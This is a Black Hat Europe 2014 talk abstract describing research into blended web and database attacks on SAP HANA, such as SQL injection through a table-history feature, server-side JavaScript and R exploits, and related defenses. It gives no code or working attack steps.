BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS presented at BlackHatEU 2014

by Juan Perez-etchegoyen, Willis Vandevanter,

Summary : It is well known there is a race going on in the "Big Data" arena (take a drink for even thinking about the "Internet of Things"). One of the stronger competitors in the "Big Data" market is Real-Time, In-Memory Platforms. An interesting thing about this platform and, the one we will talk about specifically, is that it blends everything to increase performance. The database tables, webserver engine, webserver code, authorization, analytics engine, libraries, etc. are all optimized to, if possible, never touch the disk.
Surprisingly, this causes a perspective shift for the web and database application threat landscape and how security professionals should address it. For example:
The resources are massive enough that the Database can store all previous versions of the table. We will introduce a new SQL Injection attack vector that abuses a "TIME TRAVEL" feature, providing access to previously deleted data.
The Web Application code is stored in the database and not on the filesystem! Or to put it another way, web application code is executed though a web server engine by retrieving the code directly from the database. We will present Server-Side Javascript exploits performed using SQL queries.
The Database is enhanced with special libraries to support advanced analytics and statistical features, such as integration with the R programming environment. We will demonstrate how, if implemented insecurely, this could lead to exploits "written in R."
The Web Application database queries are typically run in the context of the current users session. In other words, no database credentials are stored in the web application backend code. We will show how an attacker may need to resort to Social Engineering as a critical component of SQL Injection.
In this talk, we will explore how an attacker might blend old attack vectors to obtain the same or novel goals in the industry-leading Real-Time, In-Memory platform: SAP HANA. We will present live demos of new vulnerabilities discovered by the Onapsis Research Labs team, as well as ways to ensure your platform is protected.
Furthermore, we will present a reference framework for professionals that need to assess the security of these unique platforms, as well as sample vulnerable applications for developers to understand how to avoid common pitfalls that would introduce security risks.
Basic understanding of Web Application and Database Security concepts is recommended to get the most out of this session.